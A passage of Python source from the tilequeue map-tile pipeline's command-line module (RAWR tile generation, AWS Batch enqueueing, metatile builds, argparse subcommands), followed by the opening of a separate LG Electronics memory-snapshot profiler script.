bucket = s3_cfg.get('bucket')
assert bucket, 'Missing rawr sink bucket'
sink_region = s3_cfg.get('region')
assert sink_region, 'Missing rawr sink region'
prefix = s3_cfg.get('prefix')
assert prefix, 'Missing rawr sink prefix'
extension = s3_cfg.get('extension')
assert extension, 'Missing rawr sink extension'
tags = s3_cfg.get('tags')
from tilequeue.store import make_s3_tile_key_generator
tile_key_gen = make_s3_tile_key_generator(s3_cfg)
if s3_role_arn:
# use provided role to access S3
assert s3_role_session_duration_s, \
's3_role_session_duration_s is either None or 0'
session = botocore.session.get_session()
client = session.create_client('sts')
assume_role_object = \
client.assume_role(RoleArn=s3_role_arn,
RoleSessionName='tilequeue_dataaccess',
DurationSeconds=s3_role_session_duration_s)
creds = assume_role_object['Credentials']
s3_client = boto3.client('s3',
region_name=sink_region,
aws_access_key_id=creds['AccessKeyId'],
aws_secret_access_key=creds['SecretAccessKey'],
aws_session_token=creds['SessionToken'])
else:
s3_client = boto3.client('s3', region_name=sink_region)
rawr_sink = RawrS3Sink(
s3_client, bucket, prefix, extension, tile_key_gen, tags)
elif sink_type == 'none':
from tilequeue.rawr import RawrNullSink
rawr_sink = RawrNullSink()
else:
assert 0, 'Unknown rawr sink type %s' % sink_type
rawr_source = parse_sources(rawr_source_list)
rawr_formatter = Msgpack()
rawr_gen = RawrGenerator(rawr_source, rawr_formatter, rawr_sink)
return rawr_gen, conn_ctx
# run RAWR tile processing in a loop, reading from queue
def tilequeue_rawr_process(cfg, peripherals):
from tilequeue.rawr import RawrTileGenerationPipeline
from tilequeue.log import JsonRawrProcessingLogger
from tilequeue.stats import RawrTilePipelineStatsHandler
from tilequeue.rawr import make_rawr_queue_from_yaml
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
msg_marshall_yaml = cfg.yml.get('message-marshall')
assert msg_marshall_yaml, 'Missing message-marshall config'
msg_marshaller = make_message_marshaller(msg_marshall_yaml)
rawr_queue_yaml = rawr_yaml.get('queue')
assert rawr_queue_yaml, 'Missing rawr queue config'
rawr_queue = make_rawr_queue_from_yaml(rawr_queue_yaml, msg_marshaller)
logger = make_logger(cfg, 'rawr_process')
stats_handler = RawrTilePipelineStatsHandler(peripherals.stats)
rawr_proc_logger = JsonRawrProcessingLogger(logger)
rawr_gen, conn_ctx = _tilequeue_rawr_setup(cfg)
rawr_pipeline = RawrTileGenerationPipeline(
rawr_queue, msg_marshaller, group_by_zoom, rawr_gen,
peripherals.queue_writer, stats_handler,
rawr_proc_logger, conn_ctx)
rawr_pipeline()
def make_default_run_id(include_clock_time, now=None):
if now is None:
now = datetime.datetime.now()
if include_clock_time:
fmt = '%Y%m%d-%H:%M:%S'
else:
fmt = '%Y%m%d'
return now.strftime(fmt)
# run a single RAWR tile generation
def tilequeue_rawr_tile(cfg, args):
from raw_tiles.source.table_reader import TableReader
from tilequeue.log import JsonRawrTileLogger
from tilequeue.rawr import convert_coord_object
parent_coord_str = args.tile
parent = deserialize_coord(parent_coord_str)
assert parent, 'Invalid tile coordinate: %s' % parent_coord_str
run_id = args.run_id
if not run_id:
run_id = make_default_run_id(include_clock_time=False)
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
rawr_gen, conn_ctx = \
_tilequeue_rawr_setup(cfg,
s3_role_arn=args.s3_role_arn,
s3_role_session_duration_s=args.
s3_role_session_duration_s)
logger = make_logger(cfg, 'rawr_tile')
rawr_tile_logger = JsonRawrTileLogger(logger, run_id)
rawr_tile_logger.lifecycle(parent, 'Rawr tile generation started')
parent_timing = {}
with time_block(parent_timing, 'total'):
job_coords = find_job_coords_for(parent, group_by_zoom)
for coord in job_coords:
try:
coord_timing = {}
with time_block(coord_timing, 'total'):
rawr_tile_coord = convert_coord_object(coord)
with conn_ctx() as conn:
# commit transaction
with conn as conn:
# cleanup cursor resources
with conn.cursor() as cur:
table_reader = TableReader(cur)
rawr_gen_timing = rawr_gen(
table_reader, rawr_tile_coord)
coord_timing['gen'] = rawr_gen_timing
rawr_tile_logger.coord_done(parent, coord, coord_timing)
except Exception as e:
rawr_tile_logger.error(e, parent, coord)
rawr_tile_logger.parent_coord_done(parent, parent_timing)
rawr_tile_logger.lifecycle(parent, 'Rawr tile generation finished')
def _tilequeue_rawr_seed(cfg, peripherals, coords):
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
from tilequeue.rawr import RawrAllIntersector
from tilequeue.stats import RawrTileEnqueueStatsHandler
logger = make_logger(cfg, 'rawr_seed')
stats_handler = RawrTileEnqueueStatsHandler(peripherals.stats)
rawr_toi_intersector = RawrAllIntersector()
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, peripherals.msg_marshaller,
rawr_toi_intersector)
rawr_enqueuer(coords)
logger.info('%d coords enqueued', len(coords))
def tilequeue_rawr_seed_toi(cfg, peripherals):
"""command to read the toi and enqueue the corresponding rawr tiles"""
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
coords = map(coord_unmarshall_int, tiles_of_interest)
_tilequeue_rawr_seed(cfg, peripherals, coords)
def tilequeue_rawr_seed_all(cfg, peripherals):
"""command to enqueue all the tiles at the group-by zoom"""
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
max_coord = 2 ** group_by_zoom
# creating the list of all coordinates here might be a lot of memory, but
# if we handle the TOI okay then we should be okay with z10. if the group
# by zoom is much larger, then it might start running into problems.
coords = []
for x in xrange(0, max_coord):
for y in xrange(0, max_coord):
coords.append(Coordinate(zoom=group_by_zoom, column=x, row=y))
_tilequeue_rawr_seed(cfg, peripherals, coords)
Peripherals = namedtuple(
'Peripherals',
'toi stats redis_client '
'queue_mapper msg_marshaller inflight_mgr queue_writer'
)
def make_statsd_client_from_cfg(cfg):
if cfg.statsd_host:
import statsd
stats = statsd.StatsClient(cfg.statsd_host, cfg.statsd_port,
prefix=cfg.statsd_prefix)
else:
stats = FakeStatsd()
return stats
def tilequeue_batch_enqueue(cfg, args):
logger = make_logger(cfg, 'batch_enqueue')
import boto3
region_name = os.environ.get('AWS_DEFAULT_REGION', 'us-east-1')
client = boto3.client('batch', region_name=region_name)
logger.info('Batch enqueue ...')
batch_yaml = cfg.yml.get('batch')
assert batch_yaml, 'Missing batch config'
queue_zoom = batch_yaml.get('queue-zoom')
assert queue_zoom, 'Missing batch queue-zoom config'
job_def = batch_yaml.get('job-definition')
assert job_def, 'Missing batch job-definition config'
job_queue = batch_yaml.get('job-queue')
assert job_queue, 'Missing batch job-queue config'
job_name_prefix = batch_yaml.get('job-name-prefix')
assert job_name_prefix, 'Missing batch job-name-prefix config'
check_metatile_exists = batch_yaml.get('check-metatile-exists')
retry_attempts = batch_yaml.get('retry-attempts')
memory = batch_yaml.get('memory')
vcpus = batch_yaml.get('vcpus')
run_id = batch_yaml.get('run_id')
if not run_id:
run_id = make_default_run_id(include_clock_time=True)
if args.file:
with open(args.file) as coords_fh:
coords = list(create_coords_generator_from_tiles_file(coords_fh))
elif args.tile:
coord = deserialize_coord(args.tile)
assert coord, 'Invalid coord: %s' % args.tile
coords = [coord]
elif args.pyramid:
coords = tile_generator_for_range(0, 0, 0, 0, 0, 7)
else:
dim = 2 ** queue_zoom
coords = tile_generator_for_range(
0, 0, dim-1, dim-1, queue_zoom, queue_zoom)
for i, coord in enumerate(coords):
coord_str = serialize_coord(coord)
job_name = '%s-%d-%d-%d' % (
job_name_prefix, coord.zoom, coord.column, coord.row)
job_parameters = dict(
tile=coord_str,
run_id=run_id,
)
job_opts = dict(
jobDefinition=job_def,
jobQueue=job_queue,
jobName=job_name,
parameters=job_parameters,
)
if retry_attempts is not None:
job_opts['retryStrategy'] = dict(attempts=retry_attempts)
container_overrides = {}
if check_metatile_exists is not None:
val_str = str(bool(check_metatile_exists))
container_overrides['environment'] = dict(
name='TILEQUEUE__BATCH__CHECK-METATILE-EXISTS',
value=val_str
),
if memory:
container_overrides['memory'] = memory
if vcpus:
container_overrides['vcpus'] = vcpus
if container_overrides:
job_opts['containerOverrides'] = container_overrides
resp = client.submit_job(**job_opts)
assert resp['ResponseMetadata']['HTTPStatusCode'] == 200, \
'Failed to submit job: %s' % 'JobName'
i += 1
if i % 1000 == 0:
logger.info('%d jobs submitted', i)
logger.info('Batch enqueue ... done - %d coords enqueued', i)
def find_job_coords_for(coord, target_zoom):
assert target_zoom >= coord.zoom
if coord.zoom == target_zoom:
yield coord
return
xmin = coord.column
xmax = coord.column
ymin = coord.row
ymax = coord.row
for i in xrange(target_zoom - coord.zoom):
xmin *= 2
ymin *= 2
xmax = xmax * 2 + 1
ymax = ymax * 2 + 1
for y in xrange(ymin, ymax+1):
for x in xrange(xmin, xmax+1):
yield Coordinate(zoom=10, column=x, row=y)
def tilequeue_meta_tile(cfg, args):
from tilequeue.log import JsonMetaTileLogger
from tilequeue.metatile import make_metatiles
coord_str = args.tile
run_id = args.run_id
if not run_id:
run_id = make_default_run_id(include_clock_time=False)
logger = make_logger(cfg, 'meta_tile')
meta_tile_logger = JsonMetaTileLogger(logger, run_id)
store = \
_make_store(cfg,
s3_role_arn=args.s3_role_arn,
s3_role_session_duration_s=args.s3_role_session_duration_s,
logger=logger)
batch_yaml = cfg.yml.get('batch')
assert batch_yaml, 'Missing batch config'
queue_zoom = batch_yaml.get('queue-zoom')
assert queue_zoom, 'Missing batch queue-zoom config'
check_metatile_exists = bool(batch_yaml.get('check-metatile-exists'))
parent = deserialize_coord(coord_str)
assert parent, 'Invalid coordinate: %s' % coord_str
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
io_pool = ThreadPool(len(layer_data))
data_fetcher = make_data_fetcher(cfg,
layer_data,
query_cfg,
io_pool,
args.s3_role_arn,
args.s3_role_session_duration_s)
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
assert queue_zoom <= parent.zoom <= group_by_zoom, \
'Unexpected zoom: %s, zoom should be between %d and %d' % \
(coord_str, queue_zoom, group_by_zoom)
# NOTE: max_zoom looks to be inclusive
zoom_stop = cfg.max_zoom
assert zoom_stop > group_by_zoom
formats = lookup_formats(cfg.output_formats)
meta_tile_logger.begin_run(parent)
zip_format = lookup_format_by_extension('zip')
assert zip_format
job_coords = find_job_coords_for(parent, group_by_zoom)
for job_coord in job_coords:
meta_tile_logger.begin_pyramid(parent, job_coord)
# each coord here is the unit of work now
pyramid_coords = [job_coord]
pyramid_coords.extend(coord_children_range(job_coord, zoom_stop))
coord_data = [dict(coord=x) for x in pyramid_coords]
try:
fetched_coord_data = list(data_fetcher.fetch_tiles(coord_data))
except Exception as e:
meta_tile_logger.pyramid_fetch_failed(e, parent, job_coord)
continue
for fetch, coord_datum in fetched_coord_data:
coord = coord_datum['coord']
if check_metatile_exists:
existing_data = store.read_tile(coord, zip_format)
if existing_data is not None:
meta_tile_logger.metatile_already_exists(
parent, job_coord, coord)
continue
def log_fn(data):
meta_tile_logger._log(
data, parent, pyramid=job_coord, coord=coord)
processor = Processor(
coord, cfg.metatile_zoom, fetch, layer_data,
post_process_data, formats, cfg.buffer_cfg,
output_calc_mapping, cfg.max_zoom, cfg.tile_sizes,
log_fn=log_fn)
try:
processor.fetch()
except Exception as e:
meta_tile_logger.tile_fetch_failed(
e, parent, job_coord, coord)
continue
try:
formatted_tiles, _ = processor.process_tiles()
except Exception as e:
meta_tile_logger.tile_process_failed(
e, parent, job_coord, coord)
continue
try:
tiles = make_metatiles(cfg.metatile_size, formatted_tiles)
for tile in tiles:
store.write_tile(
tile['tile'], tile['coord'], tile['format'])
except Exception as e:
meta_tile_logger.metatile_storage_failed(
e, parent, job_coord, coord)
continue
meta_tile_logger.tile_processed(parent, job_coord, coord)
meta_tile_logger.end_pyramid(parent, job_coord)
meta_tile_logger.end_run(parent)
def tilequeue_meta_tile_low_zoom(cfg, args):
from tilequeue.log import JsonMetaTileLowZoomLogger
from tilequeue.metatile import make_metatiles
coord_str = args.tile
parent = deserialize_coord(coord_str)
assert parent, 'Invalid tile coordinate: %s' % coord_str
run_id = args.run_id
if not run_id:
run_id = make_default_run_id(include_clock_time=False)
logger = make_logger(cfg, 'meta_tile_low_zoom')
meta_low_zoom_logger = JsonMetaTileLowZoomLogger(logger, run_id)
store = _make_store(cfg,
s3_role_arn=args.s3_role_arn,
s3_role_session_duration_s=args.s3_role_session_duration_s, # noqa
logger=logger)
batch_yaml = cfg.yml.get('batch')
assert batch_yaml, 'Missing batch config'
# NOTE: the queue zoom is the zoom at which jobs will mean that
# children should be processed as well
# before then, we will only generate meta tiles for individual tiles
queue_zoom = batch_yaml.get('queue-zoom')
assert queue_zoom, 'Missing batch queue-zoom config'
assert 0 <= parent.zoom <= queue_zoom
check_metatile_exists = bool(batch_yaml.get('check-metatile-exists'))
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
io_pool = ThreadPool(len(layer_data))
data_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
# group by zoom is the exclusive stop for tiles if the command
# line coordinate is queue zoom
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
assert queue_zoom < group_by_zoom
formats = lookup_formats(cfg.output_formats)
zip_format = lookup_format_by_extension('zip')
assert zip_format
meta_low_zoom_logger.begin_run(parent)
coords = [parent]
# we don't include tiles at group_by_zoom, so unless parent.zoom is
# _more_ than one zoom level less, we don't need to include the pyramid.
if parent.zoom == queue_zoom and parent.zoom < group_by_zoom - 1:
# we will be multiple meta tile coordinates in this run
coords.extend(coord_children_range(parent, group_by_zoom - 1))
for coord in coords:
meta_low_zoom_logger._log("start processing coord",
parent=parent,
coord=coord)
if check_metatile_exists:
existing_data = store.read_tile(coord, zip_format)
if existing_data is not None:
meta_low_zoom_logger.metatile_already_exists(parent, coord)
continue
coord_data = [dict(coord=coord)]
try:
fetched_coord_data = list(data_fetcher.fetch_tiles(coord_data))
except Exception as e:
# the postgres db fetch doesn't perform the fetch at
# this step, which would make failures here very
# surprising
meta_low_zoom_logger.fetch_failed(e, parent, coord)
continue
assert len(fetched_coord_data) == 1
fetch, coord_datum = fetched_coord_data[0]
coord = coord_datum['coord']
def log_fn(data):
meta_low_zoom_logger._log(data, parent, coord)
processor = Processor(
coord, cfg.metatile_zoom, fetch, layer_data,
post_process_data, formats, cfg.buffer_cfg,
output_calc_mapping, cfg.max_zoom, cfg.tile_sizes,
log_fn=log_fn)
try:
processor.fetch()
except Exception as e:
meta_low_zoom_logger.fetch_failed(
e, parent, coord)
continue
try:
formatted_tiles, _ = processor.process_tiles()
except Exception as e:
meta_low_zoom_logger.tile_process_failed(
e, parent, coord)
continue
try:
tiles = make_metatiles(cfg.metatile_size, formatted_tiles)
meta_low_zoom_logger._log('start writing {n} tiles for coord'.format(n=len(tiles)), parent=parent, coord=coord) # noqa
for tile in tiles:
store.write_tile(tile['tile'], tile['coord'], tile['format'])
except Exception as e:
meta_low_zoom_logger.metatile_storage_failed(
e, parent, coord)
continue
meta_low_zoom_logger.tile_processed(parent, coord)
meta_low_zoom_logger.end_run(parent)
def tilequeue_main(argv_args=None):
if argv_args is None:
argv_args = sys.argv[1:]
parser = TileArgumentParser()
subparsers = parser.add_subparsers()
# these are all the "standard" parsers which just take a config argument
# that is already included at the top level.
cfg_commands = (
('process', tilequeue_process),
('seed', tilequeue_seed),
('dump-tiles-of-interest', tilequeue_dump_tiles_of_interest),
('load-tiles-of-interest', tilequeue_load_tiles_of_interest),
('enqueue-tiles-of-interest', tilequeue_enqueue_tiles_of_interest),
('enqueue-stdin', tilequeue_enqueue_stdin),
('prune-tiles-of-interest', tilequeue_prune_tiles_of_interest),
('wof-process-neighbourhoods', tilequeue_process_wof_neighbourhoods),
('wof-load-initial-neighbourhoods',
tilequeue_initial_load_wof_neighbourhoods),
('consume-tile-traffic', tilequeue_consume_tile_traffic),
('stuck-tiles', tilequeue_stuck_tiles),
('delete-stuck-tiles', tilequeue_delete_stuck_tiles),
('rawr-process', tilequeue_rawr_process),
('rawr-seed-toi', tilequeue_rawr_seed_toi),
('rawr-seed-all', tilequeue_rawr_seed_all),
)
def _make_peripherals(cfg):
redis_client = make_redis_client(cfg)
toi_helper = make_toi_helper(cfg)
tile_queue_result = make_tile_queue(
cfg.queue_cfg, cfg.yml, redis_client)
tile_queue_name_map = {}
if isinstance(tile_queue_result, tuple):
tile_queue, queue_name = tile_queue_result
tile_queue_name_map[queue_name] = tile_queue
else:
assert isinstance(tile_queue_result, list), \
'Unknown tile_queue result: %s' % tile_queue_result
for tile_queue, queue_name in tile_queue_result:
tile_queue_name_map[queue_name] = tile_queue
queue_mapper_yaml = cfg.yml.get('queue-mapping')
assert queue_mapper_yaml, 'Missing queue-mapping configuration'
queue_mapper = make_queue_mapper(
queue_mapper_yaml, tile_queue_name_map, toi_helper)
msg_marshall_yaml = cfg.yml.get('message-marshall')
assert msg_marshall_yaml, 'Missing message-marshall config'
msg_marshaller = make_message_marshaller(msg_marshall_yaml)
inflight_yaml = cfg.yml.get('in-flight')
inflight_mgr = make_inflight_manager(inflight_yaml, redis_client)
enqueue_batch_size = 10
from tilequeue.queue.writer import QueueWriter
queue_writer = QueueWriter(
queue_mapper, msg_marshaller, inflight_mgr, enqueue_batch_size)
stats = make_statsd_client_from_cfg(cfg)
peripherals = Peripherals(
toi_helper, stats, redis_client, queue_mapper, msg_marshaller,
inflight_mgr, queue_writer
)
return peripherals
def _make_peripherals_command(func):
def command_fn(cfg, args):
peripherals = _make_peripherals(cfg)
return func(cfg, peripherals)
return command_fn
def _make_peripherals_with_args_command(func):
def command_fn(cfg, args):
peripherals = _make_peripherals(cfg)
return func(cfg, peripherals, args)
return command_fn
for parser_name, func in cfg_commands:
subparser = subparsers.add_parser(parser_name)
# config parameter is shared amongst all parsers, but appears here so
# that it can be given _after_ the name of the command.
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
command_fn = _make_peripherals_command(func)
subparser.set_defaults(func=command_fn)
# add "special" commands which take arguments
subparser = subparsers.add_parser('tile-status')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('coords', nargs='*',
help='Tile coordinates as "z/x/y".')
subparser.set_defaults(
func=_make_peripherals_with_args_command(tilequeue_tile_status))
subparser = subparsers.add_parser('tile')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('coord',
help='Tile coordinate as "z/x/y".')
subparser.set_defaults(
func=_make_peripherals_with_args_command(tilequeue_process_tile))
subparser = subparsers.add_parser('enqueue-tiles-of-interest-pyramids')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--zoom-start', type=int, required=False,
default=None, help='Zoom start')
subparser.add_argument('--zoom-stop', type=int, required=False,
default=None, help='Zoom stop, exclusive')
subparser.set_defaults(
func=_make_peripherals_with_args_command(
tilequeue_enqueue_full_pyramid_from_toi))
subparser = subparsers.add_parser('enqueue-random-pyramids')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--zoom-start', type=int, required=False,
default=None, help='Zoom start')
subparser.add_argument('--zoom-stop', type=int, required=False,
default=None, help='Zoom stop, exclusive')
subparser.add_argument('gridsize', type=int, help='Dimension of grid size')
subparser.add_argument('n-samples', type=int,
help='Number of total samples')
subparser.set_defaults(
func=_make_peripherals_with_args_command(
tilequeue_enqueue_random_pyramids))
subparser = subparsers.add_parser('rawr-enqueue')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--expiry-path', required=True,
help='path to tile expiry file')
subparser.set_defaults(func=tilequeue_rawr_enqueue)
subparser = subparsers.add_parser('meta-tile')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--tile', required=True,
help='Tile coordinate as "z/x/y".')
subparser.add_argument('--run_id', required=False,
help='optional run_id used for logging')
subparser.add_argument('--postgresql_hosts', required=False,
help='optional string of a list of db hosts e.g. '
'`["aws.rds.url", "localhost"]`')
subparser.add_argument('--postgresql_dbnames', required=False,
help='optional string of a list of db names e.g. '
'`["gis"]`')
subparser.add_argument('--postgresql_user', required=False,
help='optional string of db user e.g. `gisuser`')
subparser.add_argument('--postgresql_password', required=False,
help='optional string of db password e.g. '
'`VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`') # noqa
subparser.add_argument('--store_name', required=False,
help='optional string of a list of tile store '
'names e.g. `["my-meta-tiles-us-east-1"]`')
subparser.add_argument('--store_date_prefix', required=False,
help='optional string of store bucket date prefix '
'e.g. `20210426`')
subparser.add_argument('--batch_check_metafile_exists', required=False,
help='optional string of a boolean indicating '
'whether to check metafile exists or not '
'e.g. `false`')
subparser.add_argument('--s3_role_arn', required=False,
help='optional string of the S3 access role ARN'
'e.g. `arn:aws:iam::1234:role/DataAccess-tilebuild`') # noqa
subparser.add_argument('--s3_role_session_duration_s', required=False,
type=int,
help='optional integer which indicates the number '
'of seconds for the S3 session using the '
'provided s3_role_arn'
'e.g. `3600`')
subparser.set_defaults(func=tilequeue_meta_tile)
subparser = subparsers.add_parser('meta-tile-low-zoom')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--tile', required=True,
help='Tile coordinate as "z/x/y".')
subparser.add_argument('--run_id', required=False,
help='optional run_id used for logging')
subparser.add_argument('--postgresql_hosts', required=False,
help='optional string of a list of db hosts e.g. `["aws.rds.url", "localhost"]`') # noqa
subparser.add_argument('--postgresql_dbnames', required=False,
help='optional string of a list of db names e.g. `["gis"]`') # noqa
subparser.add_argument('--postgresql_user', required=False,
help='optional string of db user e.g. `gisuser`')
subparser.add_argument('--postgresql_password', required=False,
help='optional string of db password e.g. `VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`') # noqa
subparser.add_argument('--store_name', required=False,
help='optional string of a list of tile store names e.g. `["my-meta-tiles-us-east-1"]`') # noqa
subparser.add_argument('--store_date_prefix', required=False,
help='optional string of store bucket date prefix e.g. `20210426`') # noqa
subparser.add_argument('--batch_check_metafile_exists', required=False,
help='optional string of a boolean indicating whether to check metafile exists or not e.g. `false`') # noqa
subparser.add_argument('--s3_role_arn', required=False,
help='optional string of the S3 access role ARN'
'e.g. '
'`arn:aws:iam::1234:role/DataAccess-tilebuild`') # noqa
subparser.add_argument('--s3_role_session_duration_s', required=False,
type=int,
help='optional integer which indicates the number '
'of seconds for the S3 session using the '
'provided s3_role_arn'
'e.g. `3600`')
subparser.set_defaults(func=tilequeue_meta_tile_low_zoom)
subparser = subparsers.add_parser('rawr-tile')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--tile', required=True,
help='Tile coordinate as "z/x/y".')
subparser.add_argument('--run_id', required=False,
help='optional run_id used for logging')
subparser.add_argument('--postgresql_hosts', required=False,
help='optional string of a list of db hosts e.g. '
'`["aws.rds.url", "localhost"]`')
subparser.add_argument('--postgresql_dbnames', required=False,
help='optional string of a list of db names e.g. '
'`["gis"]`')
subparser.add_argument('--postgresql_user', required=False,
help='optional string of db user e.g. `gisuser`')
subparser.add_argument('--postgresql_password', required=False,
help='optional string of db password e.g. '
'`VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`') # noqa
subparser.add_argument('--store_name', required=False,
help='optional string of a list of tile store '
'names e.g. `["my-meta-tiles-us-east-1"]`')
subparser.add_argument('--store_date_prefix', required=False,
help='optional string of store bucket date prefix '
'e.g. `20210426`')
subparser.add_argument('--batch_check_metafile_exists', required=False,
help='optional string of a boolean indicating '
'whether to check metafile exists or not '
'e.g. `false`')
subparser.add_argument('--s3_role_arn', required=False,
help='optional string of the S3 access role ARN'
'e.g. '
'`arn:aws:iam::1234:role/DataAccess-tilebuild`') # noqa
subparser.add_argument('--s3_role_session_duration_s', required=False,
type=int,
help='optional integer which indicates the number '
'of seconds for the S3 session using the '
'provided s3_role_arn'
'e.g. `3600`')
subparser.set_defaults(func=tilequeue_rawr_tile)
subparser = subparsers.add_parser('batch-enqueue')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--file', required=False,
help='Path to file containing coords to enqueue')
subparser.add_argument('--tile', required=False,
help='Single coordinate to enqueue')
subparser.add_argument('--pyramid', type=bool, required=False,
help='Enqueue all coordinates below queue zoom')
subparser.set_defaults(func=tilequeue_batch_enqueue)
args = parser.parse_args(argv_args)
assert os.path.exists(args.config), \
'Config file {} does not exist!'.format(args.config)
if args.s3_role_arn:
assert args.s3_role_arn.strip(), 's3_role_arn is invalid'
assert args.s3_role_session_duration_s, \
's3_role_arn is provided but s3_role_session_duration_s is not'
assert args.s3_role_session_duration_s > 0, \
's3_role_session_duration_s is non-positive'
with open(args.config) as fh:
cfg = make_config_from_argparse(fh,
postgresql_hosts=args.postgresql_hosts,
postgresql_dbnames=args.postgresql_dbnames, # noqa
postgresql_user=args.postgresql_user,
postgresql_password=args.postgresql_password, # noqa
store_name=args.store_name,
store_date_prefix=args.store_date_prefix, # noqa
batch_check_metafile_exists=args.batch_check_metafile_exists) # noqa
args.func(cfg, args)
|
mem_profile.py | #!/usr/bin/python
# Copyright (c) 2018 LG Electronics, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
from plat_info import PlatInfoFactory
from commander import CommanderFactory
import os, sys, json, collections, argparse, datetime, subprocess
class MemoryProfiler(object):
DFT_SNAPSHOT_EXT = '.tar.gz'
SEPARATORS = (',', ': ')
def __init__(self, folder_to_analyze, perf_type, perf_group, perf_value):
'''
Class that analyzes a folder and generates APS output
from multiple memory snapshots
@param folder_to_analyze Folder containing the testcases data
@param PerfType string to appear in perfmeta.json
@param PerfGroup string to appear in perfmeta.json
@param PerfValue string to appear in perfmeta.json
'''
self._folder = folder_to_analyze
self._pt = perf_type
self._pg = perf_group
self._pv = perf_value
print 'folder(%s) pt(%s) pg(%s) pv(%s)' \
% (self._folder, self._pt, self._pg, self._pv)
self._snapshot_exts = (MemoryProfiler.DFT_SNAPSHOT_EXT, '.tgz', '.tar', '.gz')
# List of tuples with testcase information and memory map
self._aps_lst = []
# List of aps files generated
self._aps_files = []
# Dict containing information about all test cases
self._all_tc_map = collections.OrderedDict()
@staticmethod
def capture_snapshot(comm, base_folder, test_case, scenario):
'''
Capture a memory snapshot and put it under specific folder structure
and file name as:
<base_folder>/<test_case>/<timestamp>_<scenario>.tar.gz
@param base_folder Folder containing a subfolder for each test case
@param test_case Folder containing snapshots captured for test case
@param scenario Name indicating scenario when snapshot was captured
@return String that will be passed to sys.exit() and be printed,
otherwise os.EX_OK indicating success
'''
base_utils = ('smemcap', 'gzip')
for u in base_utils:
try:
out = comm.exec_command(['which', u, '>', '/dev/null', '2>&1'], shell=True)
except subprocess.CalledProcessError as e:
if e.returncode != 255:
return 'Error %d: %s is not in PATH environment variable' \
% (e.returncode, u)
raise e
full_path = os.path.join(base_folder, test_case)
try:
os.makedirs(full_path)
except OSError as e:
if e.errno == 17:
# Folder already exists
pass
else:
# Failed to create folder
return 'Exception: ' + str(e)
cmd = ['mount', '-t', 'debugfs', 'none', '/sys/kernel/debug', '>', '/dev/null', '2>&1']
try:
comm.exec_command(cmd, shell=True)
except subprocess.CalledProcessError as e:
# Ignore error code 32 meaning it's already mounted
if e.returncode != 32:
return 'Error %d: Failed to mount debugfs with command %r' \
% (e.returncode, " ".join(cmd))
ts = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
file_name = ts + '_' + scenario + MemoryProfiler.DFT_SNAPSHOT_EXT
dest_file = os.path.join(full_path, file_name)
cmd = [base_utils[0], '|', base_utils[1], '-']
try:
out = comm.exec_command(cmd, shell=True)
except subprocess.CalledProcessError as e:
if e.returncode != 255:
return 'Error %d: Failed to create snapshot: %r' \
% (e.returncode, cmd)
raise e
with open(dest_file, 'w') as f:
f.write(out)
print 'Created snapshot: %s' % dest_file
return os.EX_OK
@staticmethod
def remove_ext(path, exts = []):
'''
Remove extension from a path from a list of extensions
@param path Path to remove its extension
@param exts List containing the extensions to search and remove
@return Path with extension removed
'''
for ext in exts:
if path.endswith(ext):
path = path[:-len(ext)]
break
return path
def get_info_from_path(self, path):
'''
Parses a file path and extract metadata about memory snapshot
@param path Path to extract test case name, timestamp and scenario
